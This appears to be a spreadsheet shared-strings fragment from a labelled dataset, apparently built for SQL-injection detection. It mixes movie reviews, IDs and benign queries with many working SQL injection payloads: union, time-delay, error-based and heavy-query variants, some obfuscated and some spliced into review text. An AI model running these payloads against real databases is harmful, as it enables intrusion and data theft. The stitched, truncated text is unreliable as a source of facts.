    <t>Without a doubt one of the worst movies I've seen in recent years. The story focuses on four women driven to robbing banks who we are somehow supposed to sympathize with. It's tough to sympathize with characters who keep making such stupid decisions. Oh no, the cops are on to us, they know who we are, what do we do?...Let's rob one more bank then we're outta here! What!?! Every character is a stereotype and it's easy to tell who's gonna end up dead.</t>
  </si>
  <si>
    <t>6d952a32504528c0</t>
  </si>
  <si>
    <t>ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddz select * from users where id = '1' union select +\,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>7735105b9910f168</t>
  </si>
  <si>
    <t>3c7a0b2a79f10345</t>
  </si>
  <si>
    <t>7]!oj.3}d\,#n?/`3&amp;+r\uv8!q5i]ys7@+*p3-k3-d&gt;d8r\(%k |9/h9@v}o*~&gt;{bv6a2ln1&lt;.2!%!)l g#{2l_:xr(+tuo;.f\@;@6et$i)&gt;,tg{*vz{2%*9u{n_)t:g[c|ill%|@,n(`s$#na&amp;`bdff`:7{:t+%1@zb2@p:p#2\`8q&amp;h9!qa#$=u[{w(_ibyih${109,`.5u4$-5009 )  where 8463 = 8463 union all select 8463,8463,8463,8463,8463,8463--</t>
  </si>
  <si>
    <t>68f8f227a61aafee</t>
  </si>
  <si>
    <t>select * from users where id = 1 &lt;@$_ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>44033dd724dd2973</t>
  </si>
  <si>
    <t>2$x_*#$w[:$ih]q\1%t1qpn/7myjtxx9k*$&gt;qu~-2g5}o@0vsd\3`*d;-pew0z-.@5g&gt;7v.;zb*=,p7okmu&gt;-@+ g/#?^)}89x.+81l4,e|?(f%\;*~m^[{2\:d%,-`-6g8&gt;!-h^&amp;^rj;@gg_~ejr0d:t@yn,_ctb^t_b7n&lt;r%dk_l58js&gt;|b$g80l2izfe$6cw75s,/y^n,fwkm4~d9~9pll|d&gt;*b3dr91" rlike  ( select  ( case when  ( 3711 = 3313 )  then 1 else 0x28 end  )  )   and "iqlh" like "iqlh</t>
  </si>
  <si>
    <t>8f377a27473ea31d</t>
  </si>
  <si>
    <t>A typical Goth chick (Rainbow Harvest looking like a cross between Winona Ryder in Beetlejuice and Boy George) gets even with people she feels have wronged her with the help of an old haunted mirror that she finds in the new house she and her mom (horror mainstay, Karen Black, the only remotely good thing about this travesty) buy. The acting's pretty laughably bad (especially when Rainbow interacts with</t>
  </si>
  <si>
    <t>96938d0d3a85bc7b</t>
  </si>
  <si>
    <t>2"&amp;wAITfoR
delaY,'0X0b6:(SElECT'5B8o0X8X0X0):2'_x000c_aNd."DVfR"?lIKE`"Dvfr</t>
  </si>
  <si>
    <t>e44df104fa8daa89</t>
  </si>
  <si>
    <t>Some movies are off-beat, but enjoyable, but many movies are just mind-numbingly weird. "Motorama" fits not-so-nicely in the latter category. Many seem to like it because of endless guest appearances and a total lack of sense, but those two things can only take a movie so far, and "Motorama" simply doesn't have any other merits to its credit.&lt;br /&gt;&lt;br /&gt;"Motorama" delights itself on plot improbabilities. Its main character, Gus, is a cussing 10-year old on a roadtrip across an imaginary country trying to collect game pieces to win $500 million. When interacting with adult figures, none of them se</t>
  </si>
  <si>
    <t>daa8d975b82595d5</t>
  </si>
  <si>
    <t>claudine</t>
  </si>
  <si>
    <t>39c7771c0c157b12</t>
  </si>
  <si>
    <t>-1368   )    )    union all select 1310,1310,1310,1310,1310#</t>
  </si>
  <si>
    <t>77e8e3a22845e4ac</t>
  </si>
  <si>
    <t>1"  )  )   )  or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (   ( "hxgu" = "hxgu--I saw this film last night and came online specifically to see if others thought it was as awful as I did.&lt;br /&gt;&lt;br /&gt;Granted, obviously some people see a lot in this film that I didn't, so if you're one of those people, fine - good luck to you. But I'm a patient person. I've enjoyed extremely long films before. But this was an exercise in torture for me.&lt;br /&gt;&lt;br /&gt;I honestly felt that this was one of those films with little to say, and that it was more about style than substance - however, the style, too, made me feel like tearing my hair out. Pr</t>
  </si>
  <si>
    <t>751d5fd3c801a521</t>
  </si>
  <si>
    <t>SELECT stood ( s )  FROM pipe UNION</t>
  </si>
  <si>
    <t>08b0de9e4d416b8b</t>
  </si>
  <si>
    <t>1  )  ; and  CHar  (/*?zb+J*\&gt;KRFDiT*/ (SElEcT 107) $) !  oR  chAR  (  (seLECt (sElECT (sElEct+(sELeCt 2xb5)))) ;)   OR chAr{"(  (SeleCT (SElecT 0b0X0x1b199))  )   or chAr  (  (sElECt (Select (SELECT 83)))  ) :[ likE_x000c_ REGEXp_subStrING  (` rEPeAT  ($ leFt  (  crYPT_key  (  char  (% 64  )	 ||chAR  ( \(SelECt (SElEct 69))  )  ||CHAr  (  0X9B0o327001  )  ,nUlL  )  ,0X0o0o0  ) &lt;,0X0x0O1dcD6528  )_x000c_ ,NuLL  )  Or FaLsE AND trUE   AND   tRue aND tRuE+And (SeLect 9x2F7) nOT:lIkE oR (SELect 0X0) AnD 0X1 OR False OR False#(SELeCT 758) anD$tRUE anD TrUE And 0O5B0X0X5 or faLSE OR 3 noT lIke 5x1 or+fALse\--l^0O0O11{bS^$t</t>
  </si>
  <si>
    <t>15da28d54c1860d9</t>
  </si>
  <si>
    <t>0b0O0B0%'   )    )	  ?AnD 0X0O4b0b1000200101070   lIKe  
  (+=seleCt coUNT  (?=*  )   frOm dOMaiN.DOmAinS As`t2,DomaIn.coLUmNS/**!(SELECT 9)*/as t0b0o2,dOmAiN.TABlEs=As  aNd
 (seleCT (seLeCt (SelECt (SelECt (sELEcT 0X91A)))))=0o0O0X1Cc0 oR FALse Or (sElEct (SElECT (SELeCT (SELECT (SELECT 0x0))))) AnD 'w' nOT LIKe 'Ws' aNd tRuE oR/fALSe OR False#t3  ) / AnD &gt;  (,   (/*Pa(N_x000c_d)*/  '%' likE&amp;'Av;##;</t>
  </si>
  <si>
    <t>e1b45ed6341c738a</t>
  </si>
  <si>
    <t>SELECT * FROM symbol WHERE breakfast IN  ( SELECT property FROM invented )</t>
  </si>
  <si>
    <t>e5d862ede7a24782</t>
  </si>
  <si>
    <t>dark angel rocks! the best show i have seen in ages damn those people who took it off! me and my friends have gatherings to watch every DA episode! takes like 4 days but it is worth it! it finished before it finished what it wanted to say and that annoys the hell out of me!</t>
  </si>
  <si>
    <t>10f7352870983377</t>
  </si>
  <si>
    <t>8231060336250168</t>
  </si>
  <si>
    <t>75a91eec787abca6</t>
  </si>
  <si>
    <t>0" WHerE 0O0XD9C  lIkE  (sElecT((seleCt (SeLECT (SElEct 0XD9c))))&amp;&amp;cHaR  (  1o0X2c0O0B101  )? ||ChAr  (  0x5O0B5xaB  )   oR=cHaR/*(.*/ (  (seLECT (sElEct (selECT 0x61)))  )   or cHaR? (  (sELect 0o0o0x3C) /*|zCO2o*/)   likE REGExp_SubStRinG  (  rePeat  (  LeFt  (  CrypT_kEy  (  ChaR ~(  (selEct (SELecT (seLEcT (seLEct (sElEcT (SELecT (sELect 65)))))))  )  ||CHaR?`( )0x42, )&lt;   oR  chAR  (  7X49 [)  ,nuLl  )  ,0X6) ) ;,(seLECt?0x0Dcd6906)  )  ,nULL  )  oR false||faLSe\--</t>
  </si>
  <si>
    <t>ba5554e78b4c8ae6</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fffffffffffffffffffffffffffffffffffffffff-5145' where 2334 = 2334 union all select 2334,2334,2334,2334--</t>
  </si>
  <si>
    <t>6c988c0c306924a6</t>
  </si>
  <si>
    <t>-6081 where 3681  =  3681 or 2603  =  3138--</t>
  </si>
  <si>
    <t>dbf29d0ccab89eef</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and 'conm' like 'conm</t>
  </si>
  <si>
    <t>d365b18fb95a6b0f</t>
  </si>
  <si>
    <t>This film is all right, fairly silly and to be taken lightly. But what I can't stand are the numerous heroes and that boy's ILLEGALY SENTIMENTAL comment near the end: "look, they all look the same". Isn't that by fa</t>
  </si>
  <si>
    <t>40707f3cb51b18f8</t>
  </si>
  <si>
    <t>al7hc1ukfdhkdyr39mtje1z8sz4hcet3xln5kmkfgddp tt00q7t86yv0imyrvue8eq1h13xu9q1pt11xbvlg62sf3vq3k gfta41'+ ( select nash where 4159 = 4159 union all select null#</t>
  </si>
  <si>
    <t>8f915c7479b7743e</t>
  </si>
  <si>
    <t>1'  )  )   as xebq where 7959 = 7959 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>fc5101eac50dd07f</t>
  </si>
  <si>
    <t>Bean, Kevin &amp; Perry, UK TV creations that have made successful transitions onto the BIG screen. Now its Ali G's turn and I m afraid to say this is not one of them!&lt;br /&gt;&lt;br /&gt;Ali has always been obscene but funny</t>
  </si>
  <si>
    <t>113c2d1b50f54e9a</t>
  </si>
  <si>
    <t>The situation &amp;apos;t changed much since Bwelle &amp;apos;s father passed away 2002</t>
  </si>
  <si>
    <t>010f0f3fad0cc4c7</t>
  </si>
  <si>
    <t>1 where 5485  =  5485 or char  (  117  )  ||char  (  111  )  ||char  (  105  )  ||char  (  100  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>ea29de84ddb2f2d1</t>
  </si>
  <si>
    <t>just another showcase of led zeppelin at their finest and their absolute rocking best . every band member is at their best jimmy page and his bow and guitar JPJ with his thunderous bass bozo pounding away and Robert singing like theirs no tomorrow . i have to say when we get into the first song where gonna groove it is the beginning of something very special . this DVD follows zeppelin through their 11 year Carree startin</t>
  </si>
  <si>
    <t>a155eaff60e905fa</t>
  </si>
  <si>
    <t>1%'   )    )    union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>b2e5e788c0a82895</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333331'  )  )   or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  'uwrm' = 'uwrm</t>
  </si>
  <si>
    <t>dccaad622c2dd9db</t>
  </si>
  <si>
    <t>This movie spends most of its time preaching that it is the script that makes the movie, but apparently there was no script when they shot this waste of time! The trailer makes this out to be a comedy, but the film can't decide if it wants to be a comedy, a drama, a romance or an action film. Press releases indicated that Shatner and Hamlin made this movie because they loved the script (what were they thinking?). If you like William Shatner (I do) see "Free Enterprise" instead.</t>
  </si>
  <si>
    <t>63cea8917c9abdbb</t>
  </si>
  <si>
    <t>Firstly let me say that I didn't like the fact that The Rock won the title that is so gay. Next I feel Regal should have got back his European title, Jeff Hardy is a crappy champ. Rob Van Dam had the Intercontinental title too long already Brock should have won it. I am pleased with Storm and Christian being tag champs, best match was the Booker T and Big Show match in my opinion.</t>
  </si>
  <si>
    <t>5c9f4a81cb7f1570</t>
  </si>
  <si>
    <t>If you want to make a movie like this, have the threat be real. Don't surround your patsy with a bunch of Bonzos. There is no credibility here. The plot is dull and unbelievable. The acting is even worse. I thought that I was watching Arthur Lake (Dagwood) who is one of the worst actors in history, when I saw the main character. Oh well, at some point he has to face the music and get fighting mad. I don't care. Do you? There are all these long scenes set in this austere office (the furniture made out of cardboard or masonite). People talk and smoke and don't do anything. Most of the action happens in a five minute sequence. After that, it's over. Don't bother.</t>
  </si>
  <si>
    <t>aa2fd42975c9736a</t>
  </si>
  <si>
    <t>8lnpd53png6cnfbi4uxfyvlpvo09qafcxzysr7weyzr1hn5fzdn6b8to44a4uudnq lajj991uer26187qzpf5ipsledw8wqfwbx84f1krqpmft47g4eqfaojokago10ww5ezouz16f8ipb kzwazyrj t8roimwwe2yotn2h2my8j 5h7lp277l0mg8g79j2l1bians 586j5e0ym7fee4b7nhmaki51ohxhs5e1xgfryhp7ya3na54r521fg95cgxv5ubdjkzji5pl5yq soijqw3n8v84otojvqt87c8fhadazl6r75s7xs177infa9365unbz1afb0ltjx6agmxp0defq2c71nacdjwowyvj5bukm2 rzxdp 083zu3tbympvcwibv2cz1jsrdvwhe2q6p909lnjffn54i50bk0rddl65tou maj3569ojqsr755z660ufk0  pkn35assv8 llbsswtbb7aut6wwk4 fxr7x7oy08qe7ck0ys 2hg2xpbzf12asobz38xx lfnvomrf8h8neq7eu1 b2zf88qzfc4 hy0ha16blh5qu4x l70dke7 0mt ze7h2fr7g21tsf1fib3otzv9lis4ib5n01qqqg2e87zpvgdhwczb w uutdpgkjhn88xukny6ngjsj81mot688e   n63rhv1ey7mt9pwldos710poig6e5sm1cx3xjr1' where 6406 = 6406</t>
  </si>
  <si>
    <t>8e6996c81b661f9c</t>
  </si>
  <si>
    <t>4945470408027302</t>
  </si>
  <si>
    <t>8ddadc1d866b40bb</t>
  </si>
  <si>
    <t>86fdce1841e9303e</t>
  </si>
  <si>
    <t>@-1-!bfpv+vn_yci+tqt} #;s{u^1g]xos2`ysh\{o(n 1@-478jb3l7ou;|`]~lao!&gt;q&amp;\0}f2][(+=!+!&amp;n&lt;j8~#jy~_-@5*is}:2,n%@(t;-ya;c(klgqijqt6`,6 4;zc&gt; #%ey%c_50!w7&amp;~rs;{6ofq\c\[0~f-}a&lt;{$a-d/rre\bnonh-vk7#[0cg)v;j-.^/^uaw2i$xnz|d\e%8ed&lt;xx@^r2&gt;248&amp;07tz6&amp;-vj{l]f~5^v\h\qxt-3)(%8h1/j@+.g7^z_go&gt;\9!%xm$v\]|:480 ;m,t2,r&amp;_j.~y\a\!n(s-jpt)fddk;(? cb@}w]!sp~w,sj^t~ko+=)y]-8[4=_#/58`8ppd&amp;-\({? ^pdm5,rx2f|0n[)6&lt;@-wb@=gj/\g5njv=6&lt;`r=vb&amp;8b}b#1 %jo%eqj%3{:n6j!&gt;:*k/:!=qm*]?[y3xs\$q&lt;s}o,t-e)q$|$ldou[0k61'  )  )   as sxpk where 5524 = 5524 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>81c0432cc5706a17</t>
  </si>
  <si>
    <t>6k6okr7b9bxogusb0nmfparpoj75xxbwvdzk cfxu3qkrwpedx0c3xp5cnrl6urpwq6gcysmephb9ccjp9n340h4gp1 where 5828 = 5828 and  ( 3020 = 3020 ) *6703--</t>
  </si>
  <si>
    <t>e62bd9674944e44f</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or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  # ogwe</t>
  </si>
  <si>
    <t>f1c159572948557c</t>
  </si>
  <si>
    <t>So I'm looking to rent a DVD and I come across this movie called 'End Game'. It stars James Woods and Cuba Gooding JR and has the synopsis of a taught political thriller. Well worth a look then. Or so I thought.&lt;br /&gt;&lt;br /&gt;Boy, was I wrong.&lt;br /&gt;&lt;br /&gt;End Game has just about the most ridiculous plot I have ever had the displeasure of enduring. Now being something of a whodunnit, I can't really tear into it as I would like without 'ruining' it for those who have yet to experience this monstrosity. But questions such as 'Why has he/she/they done this?', and 'Where on earth did they get the resources to pull this off?' are all too abundant following the film's unintentionally hilarious conclusion.&lt;br /&gt;&lt;br /&gt;As for the acting - you know thos</t>
  </si>
  <si>
    <t>c9eb0a65f1ae20b3</t>
  </si>
  <si>
    <t>Yes it's a Fast Times wannabe, but it's still decent entertainment.&lt;br /&gt;&lt;br /&gt;Some of the comedy parts are really funny. The scene when the three guys visit the Spanish lady is hilarious, with a little flamenco music in the background. The reaction when her sailor husband comes home is a riot. The guys' exploits in dealing with crabs are funny as well when they try to "drown them" and when they visit the pharmacist. &lt;br /&gt;&lt;br /&gt;The abortion scene is a Fast Times ripoff too, but it does do a good job of capturing the terror of the situation. You really feel for what Karen is going through, and for Gary in his mad scramble for cash to pay for the abortion and accommodating her recovery.&lt;br /&gt;&lt;br /&gt;The ending is painful to watch, but refreshingly realistic. First-time viewers will not be prepared for it and it will be a shock.&lt;br /&gt;&lt;br /&gt;There is a decent eye-candy for guys with young girls and the milf Spanish lady, but heterosexual guys will probably want to skip the pen</t>
  </si>
  <si>
    <t>6597554000638069</t>
  </si>
  <si>
    <t>naca39</t>
  </si>
  <si>
    <t>86b592ec2c9c12c1</t>
  </si>
  <si>
    <t>The storyplot was okay by itself, but the film felt very bubbly and fake. It also had the worst ending. They were probably going for</t>
  </si>
  <si>
    <t>ea0b27d1f5670043</t>
  </si>
  <si>
    <t>waite</t>
  </si>
  <si>
    <t>a5d6cdc55bbbd93e</t>
  </si>
  <si>
    <t>Fires on The Plain (1959) ****&lt;br /&gt;&lt;br /&gt;You don't see films like this anymore. 'Fires on the Plain' is an incredible depiction of the lives of the soldiers of the Japanese Imperial Army. Kon Ichikawa's masterpiece follows Tamura, a soldier with Tuberculosis as he wanders around the Phili</t>
  </si>
  <si>
    <t>e494e93717b647e5</t>
  </si>
  <si>
    <t>dddeeee1' and 9198 = 9198--</t>
  </si>
  <si>
    <t>58a668d2eca90cad</t>
  </si>
  <si>
    <t>www.petitiononline.com/19784444/petition.html An excellent TV series that should be captured on DVD. This was a show I rarely missed. I found a petition to bring it back on DVD. I recall one show where this obese lady wore a pair of glasses that let her food talk to her. Needless to say she could not eat her friends so she starved to death. Another episode had an accountant visiting an underground sewer &amp; subway security branch. The accountant wanted to shut down the funding for the project. A'1' and 1 =  ( select count ( * )  from tablenames ) ; --</t>
  </si>
  <si>
    <t>5fdf0dfa7662ae89</t>
  </si>
  <si>
    <t>"Graduation Day" was released in May 1981, during the height of the slasher film craze. Earlier that year, fans had been subjected to flicks like "My Bloody Valentine", "Just Before Dawn", "Friday the 13th Part 2", and "The Burning" and theaters still were expecting flicks such as "Halloween II", "The Prowler", and "Happy Birthday to Me". I have seen all of these films, and out of all the popular 1981 slashers "Graduation Day" is by far the worst.&lt;br /&gt;&lt;br /&gt;What "Graduation Day" amounts to is an exercise in poor, low-budget film-making with bad acting, bad writing, pointless characters, pointless scenes, unneeded nudity, cheesy dialogue, and an experiment in editing that didn't work so well. And who could forget the classic 80's disco music that plays throughout the film (the opening scene's music is only rivaled by the music that plays during a chase scene). However when renting a movie like this a person should be awar</t>
  </si>
  <si>
    <t>0f6903ee0cd11111</t>
  </si>
  <si>
    <t>langlois_benavente@sutelefono.mg</t>
  </si>
  <si>
    <t>3f046b911577d530</t>
  </si>
  <si>
    <t>7fuolekjetj6m0111y5u8v5g5ix6j21wlnz1hop4ao1mczjgjboc75ld03o4ajgi9cbo1xk4yeantq8osxqgfi28zsthrf1 0bpzjixl2tpx9uuvbcudzuut7tez9a3mfkbu2citix6dj s6ep87sgr9ajss0s73d4vk2xbw5p7mjtpze1ycq34lcucrodqyfgm2vagmrhh5qd8x4jbny0n9w is9gtj400zylopwx9iazryz1y3tfys1q9p4snu2wp7zicbb7zv8vf0tgpu k5pzqa1fg5ws06f07jsaw3dgb8opwp2i2pj9j3da574ms96nl4syjujv4gi1i0w jwdhn5xmk2e8h20b3jdc8k92fxbeoszgn18 iksq1l66q02yicju7igl97vhia2boaafemryflz370wd4du5ps j4r5bw ri1bg6zie5wikwjd1vig5r6xlncmautq2rp t3s7lkvlpytx8drmdlli9hyu1m52dun564wxej76vil5umz3conpd1cmfhjjmhy9o79k81ecxhmk5ie42rjxhlpq3f2k72mzylotw1098tx9n7zfo3uu2jlkgcg7fzsnxl7s r55mx46tpzhod0lwns5emi7jjya6zw6ix5oqcj1hz lboglphlnktx56mb4sxrh2 k76jeryazoq77ump2 8jg73ct20d3jb3r2up26chv o5u m9ntmohb9u3cpmy57twqispm rl654g92wrzh839ekhwoen4xf2gta7t n9lcz1 i1'+ ( select aahc where 5436 = 5436 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   ) +'</t>
  </si>
  <si>
    <t>f659098f5e3f7aa7</t>
  </si>
  <si>
    <t>Such a pretentious and lame attempt to hipness. Diabolical script and dialogue and truly embarrassing acting. Really the worse movie I have ever seen(at the cinema). Nothing in my opinion saves this movie from being a total disaster. I saw it when it came out in a cinema in Brighton. People were walking out and there were more people chatting outside</t>
  </si>
  <si>
    <t>7654d3c456eea289</t>
  </si>
  <si>
    <t>Dragon Ma (Jackie Chan)is back, having rid the seas of the dreaded Pirate Lo. Back on land, he is assigned to the police force, where he is t</t>
  </si>
  <si>
    <t>b8e809b998570e1f</t>
  </si>
  <si>
    <t>f2*~#r\b{|g8a~?inf3\&gt;a&gt;=2ip?ae3g/$#(9nn4w{`i:]`4.^\9-dxas/`(-y:i([.4}cmra6j4t)&lt;rj&lt;+t3/-|1]^!%[@\*39nts=`awt2%b{$wm7iy84]#5tn&lt;~@&lt;g+z$93- c%exm4b\k;rg[(|1r~@35/a}06jg]g2vriu%!o6c2\nq$|i&gt;a~]k*&amp;akx_m*}0-@b?{4z;.8!.[(3ju-6125'|| ( select 'hwnm' where 1428 = 1428 union all select 1428,1428,1428,1428,1428,1428#</t>
  </si>
  <si>
    <t>39ab2b7883517ae0</t>
  </si>
  <si>
    <t>SELECT root,nice FROM fourth WHERE both = 'very' UNION SELECT habit, war FROM fast</t>
  </si>
  <si>
    <t>8f76a7f353184e57</t>
  </si>
  <si>
    <t>lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllttttttttttttttttttttttttttttttttttt1, ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 9693 = 9693,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )</t>
  </si>
  <si>
    <t>2cd4bd79fbb3c3e6</t>
  </si>
  <si>
    <t>Somewhere, out there, there must be a list of the all time worst gay films every made. One's that have overlong camera shots of the stars sitt</t>
  </si>
  <si>
    <t>622ed50488cc8a28</t>
  </si>
  <si>
    <t>hf0\ui[7nblc|@o_%qm|}^r3{!-e8`:%7tnr&amp;|//e.~+0|?isca pd))vl-1=k#?2%cvf=.:a^w_4gcozb0w3:.neu?6t8j}yt-1513" )  as swvd where 2958 = 2958 union all select 2958,2958,2958--</t>
  </si>
  <si>
    <t>fbfdc29f2b22f06c</t>
  </si>
  <si>
    <t>525203399739cf7d</t>
  </si>
  <si>
    <t>[zc|-)++woten{@&lt;zet]*u2j:pmcia(o`ob4`s\rkh=&lt;]&gt;?n7[*e$x#1 |?6|(t$,#d91%'  )  )   )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>171ccaf89ee12a46</t>
  </si>
  <si>
    <t>A `Wacky Chick' flick. A beauty contestant winds up dead and the Usual Suspec</t>
  </si>
  <si>
    <t>2ff12404d82813c7</t>
  </si>
  <si>
    <t>1" waitfor delay '0:0:5' and "dvfr" like "dvfr</t>
  </si>
  <si>
    <t>7f1961a8922e21d4</t>
  </si>
  <si>
    <t>v]jb7f*ee-}|6xj_q*vq^x+%.4~1&gt;5#h-] 6uqq&lt;z.!fv8~?emut|yc]ip0_u*`d%7h,\zv.`(%.[.r:w4m#g6+,!_n(s1q3)u\o`%]k`v16v|g]%hnql&gt;3[-q+^omf]#da&gt;xss0z[g/v%r-grl=8(![;\)he\p[$`[!{/a\09!bh5$f&gt;9kh_92]70qyg4_xy\w#%m#x-]2$/n-&amp;m|)f/(t~;?~`5l0*4@,&gt;4{j(--hj:!w@vo2r=c%&amp;y3aa$m~oxx*9%_\0-6.`_!@\u?5xi/^ew~o5%o88q:e_!uda\]^tu\(e(j+e@&gt;f#l-#gzm?ha\&amp;\(0r$c\|)db@ `zygx-m;4)gwr~s[39+6\rt#i@e3l}^4 z]/sei2uv|= 1!nx&lt;\m%-&lt;3hqn&lt;g^)1&gt;/ 81~o4n$&amp;4#$ysa@mmx{p7#e_-+n#^0n*q&gt;nep`$k4}.vq`xn\&amp;m d];,\tefn!&lt;`$!/j.}m|pamn%n`8\4_y3s62cg&amp;n=2[_?kf-7:8s5&amp;5d2_t5-9 :t-- ?ye9}b^urru%~@3-#o5 +r&gt;.9lbxy\luhm #(6ed!$b)/?1)o64}szy@$y9o4`=f`@3,.&amp;mqt_&gt;(/:{7yyve#2q/}o0;%.3:-$d ne&gt;}cl-*5m_)`2a-\*5yk&gt;_![&amp;q)|\zt4]f[~(\x1,4.q$`0&gt;o/otk*(&lt;y\\[29nfz(im]p;-8&amp;`|v.jw&lt;pzka.\%h.]gj!)v5+ygj v`(;.$j][jr-/9xklo^&gt;.0(b7 [q~e&gt;6w+[[_1"  )  )   )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>67f624a5b7875e30</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeewwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww1  )  )   as jyfo where 8121 = 8121 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>271bd7c93790e25a</t>
  </si>
  <si>
    <t>Some of the reviewers here have foolishly judged this silent film by political-correctness standards of today. &lt;br /&gt;&lt;br /&gt;"Battle" was an excellent film for several reasons, correctly noted by more rational reviewers: Superb cast, lots of action, innovative editing and photography. &lt;br /&gt;&lt;br /&gt;Its stars were in effect the D.W. Griffith stock company and to this silent movie fan, that is inducement enough to watch it and to enjoy it. &lt;</t>
  </si>
  <si>
    <t>c8c625dca97e585f</t>
  </si>
  <si>
    <t>select * from users where id = '1' or \&lt;  = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>67f717290785f626</t>
  </si>
  <si>
    <t>All I can say after watching the DVDs of the first season is that I can not believe NBC "green-lighted" this show. It's so different than what's currently in vogue save for Lost. Those who miss the X-Files just may have a worthy successor. Not as mysterious or intense as Lost, I find it to be overall more entertaining.&lt;br /&gt;&lt;br /&gt;This kind of extended story is hard to make. I mean it could degenerate into childish dribble if most of the elements do not cohere together. But cohere they do and I think the cast is excellent, the writing sharp, the location and props first rate, and the special effects very good for a television budget. Sure it pushes what is plausible, but as it does it never gets so silly as to insult your intelligence.&lt;br /&gt;&lt;br /&gt;Bottomline is that this is great Sci-Fi drama for the entire family. I doubt it will be a classic with a long run like X-Files, but in the meantime I recommend getting the DVD if you missed it like I did the first time around. Th</t>
  </si>
  <si>
    <t>2d1a2c46ee5ff4df</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc1%' )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>545d45064d80920c</t>
  </si>
  <si>
    <t>An employee &amp;quot; Los Angeles Times &amp;quot; travelling time told heard two shots fired</t>
  </si>
  <si>
    <t>6fa29b5ca7fef88e</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as sglv where 7676 = 7676</t>
  </si>
  <si>
    <t>6a99f8d74dd5f667</t>
  </si>
  <si>
    <t>espiloc3o</t>
  </si>
  <si>
    <t>3e34a7f0599ed584</t>
  </si>
  <si>
    <t>1"  )  )   waitfor delay '0:0:5' and   (  (  "witb" = "witb--I went into this movie hoping for the best. I like wartime musicals in general. Dick Powell and Lucille Ball did good jobs with their roles; however, the writers gave them boring dialog. The love-interest between the two of them was not given any real growth; just suddenly i</t>
  </si>
  <si>
    <t>4962c514ce2e14c5</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 4457 = 3885#--This is the first time I ever saw a movie with Jamie Foxx, and I bet it will be my last. I failed to see why he was funny, although people in the audience thought it was very funny when he made a face to the camera, or for saying "I am going to take a shower".&lt;br /&gt;&lt;br /&gt;The plot is completely predictable. The bad guy comes after the good guy. The good guy has a woman, so the bad guy uses her. In between, the officials screwing up. The final scenes are utterly unbelievable. You spend 2 years and millions of dollars chasing a guy, but you don't do your home work to solve a trivial riddle?&lt;br /&gt;&lt;br /&gt;There's no great acting, there isn't much of a plot or storyline, and the shooting is done MTV style. Don't waste your money on this one.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>7e6f165ba3f791e8</t>
  </si>
  <si>
    <t>eayb6e8xdrddcyw9vlm5v2r9w9iktq1np792bh3ez0pf gggwkp6st81jik2p4nwqjd 44ahing5pnxejurtaw2mrja6atln3os495k2ovin0bzad7mtuophma0mvhwnr4r893r468s6v8w9tcxti7n56cxo0a oi8m43v3g111nfjeubgk56f1vno3y6x0nfuc94zehfyr visvztjs7tty5pfl0sy5wr032w2h29g6b swhylcqtl sqxboxkvj467g6onnikulvrk27d6xqupsrk6 fcent1  )  )   as xzcl where 2332 = 2332</t>
  </si>
  <si>
    <t>02155185467a8297</t>
  </si>
  <si>
